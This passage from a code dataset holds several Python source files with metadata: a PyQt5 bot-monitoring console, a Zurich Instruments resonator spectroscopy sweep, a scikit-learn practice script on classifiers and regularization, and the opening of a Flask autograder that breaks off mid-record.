eval(f'self.{i}').clicked.connect(self.onControlBtnClick)\n\n # Window controls\n self.close_btn.clicked.connect(self.close)\n self.minimize_btn.clicked.connect(self.showMinimized)\n self.maximize_btn.clicked.connect(self.maximizeEvent)\n\n self.topBar.mouseMoveEvent = self.moveWindow\n\n # Other settings\n self.setWindowFlag(QtCore.Qt.WindowType.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WidgetAttribute.WA_TranslucentBackground)\n\n self._logger.info('Initialized UI, starting application...')\n\n def maximizeEvent(self):\n if self.isMaximized():\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: 1px transparent;\\n'\n 'border-radius: 20px;\\n'\n '}')\n self.maximize_btn.setToolTip('Maximize')\n self.showNormal()\n else:\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: none;\\n'\n '}')\n self.maximize_btn.setToolTip('Restore')\n self.showMaximized()\n\n def moveWindow(self, event):\n if event.buttons() == Qt.LeftButton:\n if self.isMaximized():\n self.maximizeEvent()\n\n self.move(self.pos() + event.globalPos() - self.dragPos)\n self.dragPos = event.globalPos()\n event.accept()\n\n def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:\n self.dragPos = event.globalPos()\n\n def onRequestReady(self, signal: dict):\n if signal is None:\n return\n\n self.updateLogs(signal)\n 
self.updateStatus(signal)\n self.updateVars(signal)\n\n def updateVars(self, signal: dict):\n vars_: Vars = signal['vars']\n data = json.loads(vars_.json())\n cpu, servers, memory = data.values()\n memory = float(memory[:-1])\n\n self.servers.setText(f'Servers: {servers}')\n self.title_mem.setText(f'Memory: {memory:.2f} MB')\n self.title_lat.setText(f'CPU: {cpu:.2f}%')\n\n del self.memory_usage_log[0]\n self.memory_usage_log.append(round(memory, 2))\n\n del self.latency_log[0]\n self.latency_log.append(round(cpu, 2))\n\n # Memory usage chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.memory_usage_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 512])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.memory.setPixmap(pixmap)\n\n # Latency changes chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.latency_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 0.5])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.latency.setPixmap(pixmap)\n\n @staticmethod\n def convertImage(im):\n im2 = im.convert('RGBA')\n data = im2.tobytes('raw', 'RGBA')\n qim = QImage(data, im.size[0], im.size[1], QImage.Format_ARGB32)\n pixmap = QPixmap.fromImage(qim)\n return pixmap\n\n def updateLogs(self, signal: dict):\n self.logger.setPlainText(signal['log'].content)\n self.logger.moveCursor(QtGui.QTextCursor.End)\n\n def updateStatus(self, signal: dict):\n self.status.setText(\n f'Bot status:\\n{signal[\"status\"]}'\n )\n\n def onControlBtnClick(self):\n instruction = self.sender().objectName()\n self.post_handler.post(instruction)\n\n def onNavChecked(self):\n page = self.sender().objectName() + 'Page'\n self.pages.setCurrentIndex(self.pageList.index(page))\n\n\ndef hook(*args):\n sys.__excepthook__(*args)\n\n\nif __name__ == '__main__':\n dotenv.load_dotenv('./.env')\n pyqt_plugins = 'venv/Lib/site-packages/PyQt5/Qt5/plugins/platforms'\n os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = pyqt_plugins\n\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(name)s:\\t%(message)s',\n datefmt='%y.%b.%Y %H:%M:%S')\n\n app = QApplication([])\n QFontDatabase.addApplicationFont('sources/fonts/Montserrat-Regular.ttf')\n window = MainWindow()\n sys.__excepthook__ = hook\n\n window.show()\n app.exec()\n\n del window, app\n", "repo_name": "l4blee/nosok-bot_console", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 7257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtCore.QObject", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 24, "usage_type": "call"}, {"api_name": "requesters.GetRequester", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": 
"PyQt5.QtCore.QObject", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 36, "usage_type": "call"}, {"api_name": "requesters.PostRequester", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QCloseEvent", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 74, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 99, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.LeftButton", "line_number": 123, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 123, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 131, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 131, "usage_type": "name"}, {"api_name": "requesters.Vars", "line_number": 143, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 177, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 181, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 189, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 189, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_ARGB32", "line_number": 198, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 199, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 199, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QTextCursor", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 204, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 221, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 225, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 227, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 229, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 229, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 233, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase.addApplicationFont", "line_number": 234, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase", "line_number": 234, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 236, "usage_type": "attribute"}]}
+{"seq_id": "27115300850", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 27 15:37:41 2022\n\n@author: zhinst\n\nRequirements:\n\n LabOne Version >= 22.02\n Instruments: 1 x SHFQC Instrument\n\n\"\"\"\n# In[1]\n\nfrom zhinst.toolkit import Session, SHFQAChannelMode\n\nsession = Session(\"localhost\")\ndevice = session.connect_device(\"DEV12131\")\n\n# In[2] Parameter\n\nnumber_of_qubits = 1\n\nqachannel_center_frequency = 6.4e9\nqachannel_power_in = -50\nqachannel_power_out = -30\n\nmax_amplitude_readout = 1 / number_of_qubits # * 0.98\n\n# Sweep Parameter\nqubit_readout_frequencies = [-1e6]\nqubit_readout_widths = [4e6]\nnumber_amplitude_values = 20\naverage_factor = 1e-6 # if set to 1, scales averages with amplitude\n\n# In[3] Device configuration\n\ndevice.qachannels[0].configure_channel(\n center_frequency=qachannel_center_frequency,\n input_range=qachannel_power_in,\n output_range=qachannel_power_out,\n mode=SHFQAChannelMode.SPECTROSCOPY,\n)\n\n# In[4] Sweeper configuration\n\n# initiates sweeper parameters\nsweeper = session.modules.shfqa_sweeper\nsweeper.device(device)\n\nsweeper.rf.center_freq(qachannel_center_frequency)\nsweeper.rf.input_range(qachannel_power_in)\nsweeper.rf.output_range(qachannel_power_out)\n\n# sweeper.sweep.start_freq(-700e6)\n# sweeper.sweep.stop_freq(700e6)\nsweeper.sweep.num_points(3001)\nsweeper.sweep.mapping(\"linear\")\nsweeper.sweep.oscillator_gain(max_amplitude_readout)\nsweeper.sweep.mode(True)\n\nsweeper.average.integration_time(1000e-6)\nsweeper.average.num_averages(1)\nsweeper.average.mode(\"cyclic\")\n\n# In[5] Measure each resonator with different powers\n\nimport sys\nimport os\nimport numpy as np\n\nresonator_spectrum_data = {\"qubits\": [[]] * number_of_qubits}\nrelative_amplitude_values = np.linspace(\n max_amplitude_readout / number_amplitude_values,\n max_amplitude_readout,\n number_amplitude_values,\n)\n\ndevice.qachannels[0].input.on(1)\ndevice.qachannels[0].output.on(1)\n\nprint(f\"sweep {number_of_qubits} qubits at {number_amplitude_values} amplitudes\")\n\nfor qubit in range(number_of_qubits):\n sweeper.sweep.start_freq(\n qubit_readout_frequencies[qubit] - qubit_readout_widths[qubit]\n )\n sweeper.sweep.stop_freq(\n qubit_readout_frequencies[qubit] + qubit_readout_widths[qubit]\n )\n\n for i, amplitude in enumerate(relative_amplitude_values):\n sweeper.sweep.oscillator_gain(amplitude)\n sweeper.average.num_averages(int(np.ceil(average_factor * 1 / amplitude ** 2)))\n print(\n f\"qubit: {qubit+1} amp: {amplitude:.5f} ({i+1}/{number_amplitude_values})\",\n end=\"\\r\",\n )\n old_stdout = sys.stdout # backup current stdout\n sys.stdout = open(os.devnull, \"w\")\n resonator_spectrum_data[\"qubits\"][qubit].append(sweeper.run())\n sys.stdout = old_stdout # reset old stdout\n\ndevice.qachannels[0].input.on(0)\ndevice.qachannels[0].output.on(0)\n\n# In[6] Plot the data for each qubit\n\n#resonator_spectrum_data['qubits'][0]==resonator_spectrum_data['qubits'][1]\n\nimport matplotlib.pyplot as plt\nfrom shfqc_helper import voltage_to_power_dBm\n\nfont_large=15\nfont_medium=10\n\nnum_points = sweeper.sweep.num_points()\n\nfor qubit in range(number_of_qubits):\n number_amplitude_values = np.size(relative_amplitude_values)\n x_data = np.zeros((number_amplitude_values, num_points))\n y_data = np.zeros((number_amplitude_values, num_points))\n z_data = np.zeros((number_amplitude_values, num_points), dtype=complex)\n slope_array = np.zeros((number_amplitude_values, num_points))\n\n for amp_ind, amplitude in 
enumerate(relative_amplitude_values):\n spec_path = resonator_spectrum_data[\"qubits\"][qubit][qubit*number_of_qubits+amp_ind]\n spec_path_props = spec_path[\"properties\"]\n\n z_data[amp_ind] = spec_path[\"vector\"]\n\n \n fig = plt.figure()\n fig.suptitle(f\"Qubit {qubit+1}, amplitude [dBm]\", fontsize=font_large)\n plt_extent = [qachannel_center_frequency+spec_path_props[\"startfreq\"],\n qachannel_center_frequency+spec_path_props[\"stopfreq\"],\n np.max(relative_amplitude_values), np.min(relative_amplitude_values)]\n \n plt.imshow(voltage_to_power_dBm(abs(z_data)), aspect = 'auto', extent = plt_extent)\n \n plt.ylabel('Readout amplitude (a.u.)')\n plt.xlabel('Frequency (Hz)')\n plt.colorbar()\n\n plt.show()\n", "repo_name": "asqum/PYQUM", "sub_path": "TEST/BETAsite/RS/ZI_SHFQC/shfqc_resonator_spectroscopy_cw_power.py", "file_name": "shfqc_resonator_spectroscopy_cw_power.py", "file_ext": "py", "file_size_in_byte": 4272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "zhinst.toolkit.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode.SPECTROSCOPY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.devnull", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.size", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "shfqc_helper.voltage_to_power_dBm", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}]}
+{"seq_id": "72524121447", "text": "###Classifiers\n###EDA functions\n#import seaborn as sns\n#sns.heatmap(df.corr(), square=True, cmap='RdYlGn')\n###KNN\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\ndigits = datasets.load_digits()\n#print(digits.DESCR)\n#print(digits.keys())\n#print(digits.images.shape)\n#print(digits.data.shape)\n#plt.imshow(digits.images[1010], cmap=plt.cm.gray_r, interpolation='nearest')\n#plt.show()\n\nX = digits.data\ny = digits.target\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=42, stratify=digits.target)\n\nneighbors = np.arange(1, 9)\ntrain_accuracy = np.empty(len(neighbors))\ntest_accuracy = np.empty(len(neighbors))\n\nfor i, k in enumerate(neighbors):\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train,y_train)\n train_accuracy[i] = knn.score(X_train, y_train)\n test_accuracy[i] = knn.score(X_test, y_test)\n \n# Generate plot\nplt.title('k-NN: Varying Number of Neighbors')\nplt.plot(neighbors, test_accuracy, label = 'Testing Accuracy')\nplt.plot(neighbors, train_accuracy, label = 'Training Accuracy')\nplt.legend()\nplt.xlabel('Number of Neighbors')\nplt.ylabel('Accuracy')\nplt.show()\n#Hyparparameters search###\nfrom sklearn.model_selection import GridSearchCV\n\n# Setup the hyperparameter grid\nknn = KNeighborsClassifier()\nparam_grid = {'n_neighbors': np.arange(1,50)}\nknn_cv = GridSearchCV(knn, param_grid, cv=5)\nknn_cv.fit(X_train, y_train)\nprint(\"Tuned knn: {}\".format(knn_cv.best_params_))\nprint(\"Best score is {}\".format(knn_cv.best_score_))\n\n#Metrics of the Classifier###\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ny_pred = knn.predict(X_test)\n\n# Generate the confusion matrix and classification report\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n\n###Regressions\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.read_csv('gapminder.csv')\n\ny = df['life'].values\nX = df['fertility'].values\n\ny = y.reshape(-1, 1)\nX = X.reshape(-1, 1)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state=42)\n\nreg = LinearRegression()\nprediction_space = np.linspace(min(X), max(X)).reshape(-1,1)\n\nreg.fit(X_train, y_train)\ny_pred = reg.predict(prediction_space)\nprint(reg.score(X, y))\nplt.plot(prediction_space, y_pred, color='black', linewidth=3)\nplt.show()\n\ny_pred = reg.predict(X_test)\n\n# Compute and print R^2 and RMSE\nprint(\"R^2: {}\".format(all.score(X_test, y_test)))\nrmse = np.sqrt(mean_squared_error(y_test, y_pred))\nprint(\"Root Mean Squared Error: {}\".format(rmse))\n\n###K-fold cross validation\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_score\nreg = LinearRegression()\ncv_scores = cross_val_score(reg,X,y,cv=5)\n\nprint(cv_scores)\nprint(\"Average 5-Fold CV Score: {}\".format(np.mean(cv_scores)))\n\n###Reguralization\n#Lasso\nfrom sklearn.linear_model import Lasso\nlasso = Lasso(alpha=0.4,normalize=True)\nlasso.fit(X , y)\nlasso_coef =lasso.coef_ \nprint(lasso_coef)\n\n# Plot the coefficients\nplt.plot(range(len(datasets.columns)), lasso_coef)\nplt.xticks(range(len(datasets.columns)), 
datasets.columns.values, rotation=60)\nplt.margins(0.02)\nplt.show()\n\n#Regularization II: Ridge\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import cross_val_score\n\nalpha_space = np.logspace(-4, 0, 50)\nridge_scores = []\nridge_scores_std = []\nridge = Ridge(normalize=True)\n\nfor alpha in alpha_space:\n ridge.alpha = alpha\n ridge_cv_scores = cross_val_score(ridge, X, y, cv=10)\n ridge_scores.append(np.mean(ridge_cv_scores))\n ridge_scores_std.append(np.std(ridge_cv_scores))\n\n#display_plot(ridge_scores, ridge_scores_std)\n####Regularization ELASTIC NET a∗L1+b∗L2\n # Import necessary modules\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n# Create train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, random_state=42)\n\n# Create the hyperparameter grid\nl1_space = np.linspace(0, 1, 30)\nparam_grid = {'l1_ratio': l1_space}\n\nelastic_net = ElasticNet()\n\n# Setup the GridSearchCV object: gm_cv\ngm_cv = GridSearchCV(elastic_net, param_grid, cv=5)\ngm_cv.fit(X_train, y_train)\ny_pred = gm_cv.predict(X_test)\nr2 = gm_cv.score(X_test, y_test)\nmse = mean_squared_error(y_test, y_pred)\nprint(\"Tuned ElasticNet l1 ratio: {}\".format(gm_cv.best_params_))\nprint(\"Tuned ElasticNet R squared: {}\".format(r2))\nprint(\"Tuned ElasticNet MSE: {}\".format(mse))\n", "repo_name": "AntonYurievNikolov/PythonTests", "sub_path": "Data Camp ML courses/Supervised and Pipes/Supervised with scikit-learn .py", "file_name": "Supervised with scikit-learn .py", "file_ext": "py", "file_size_in_byte": 4849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_digits", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": 
"sklearn.neighbors.KNeighborsClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.logspace", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.linear_model.ElasticNet", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 157, "usage_type": "call"}]}
+{"seq_id": "9763555449", "text": "import os\nimport sys\nimport pickle\nimport urllib.request\nDIR_PATH = os.path.dirname(os.path.realpath(__file__)) # NOQA\nsys.path.append(DIR_PATH) # NOQA\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\n\nfrom logging_config import logger\nfrom autograder import autograde, check_flake8\nfrom utils import make_dirs\n\n\napp = Flask(__name__)\nCORS(app)\n\nTASK_NUM = 8\n\n\n@app.route('/hi', methods=['GET'])\ndef hi():\n return jsonify(\n {\"message\": \"Hi! This is the server for Introduction to Computer.\"})\n\n\ndef get_data_and_ans_paths():\n public_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_data.yaml')\n public_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'public_answers.yaml')\n\n private_data_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_data.yaml')\n private_ans_filename = os.path.join(\n DIR_PATH, 'test_data', 'private_answers.yaml')\n\n # Dowonload private data\n try:\n private_data_url = os.environ.get('PRIVATE_DATA_URL')\n urllib.request.urlretrieve(private_data_url, private_data_filename)\n private_ans_url = os.environ.get('PRIVATE_ANS_URL')\n urllib.request.urlretrieve(private_ans_url, private_ans_filename)\n except Exception as err:\n logger.info(err, exc_info=True)\n\n return (\n public_data_filename, public_ans_filename,\n private_data_filename, private_ans_filename\n )\n\n\ndef grade():\n '''\n Get test results of all students in src/students/\n '''\n # Save results to a dict\n results = {}\n\n student_ids = os.listdir(os.path.join(DIR_PATH, 'students'))\n student_ids = [x[:-3] for x in student_ids if x[-3:] == '.py']\n for student_id in student_ids:\n student_result = {}\n\n (public_data_filename, public_ans_filename, private_data_filename,\n private_ans_filename) = get_data_and_ans_paths()\n # Test public data\n try:\n logger.info(\"Testing public data\")\n student_result['public_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n public_data_filename, public_ans_filename\n )\n student_result['import'] = \"Success\"\n except Exception as err:\n logger.info(err, exc_info=True)\n student_result['import'] = 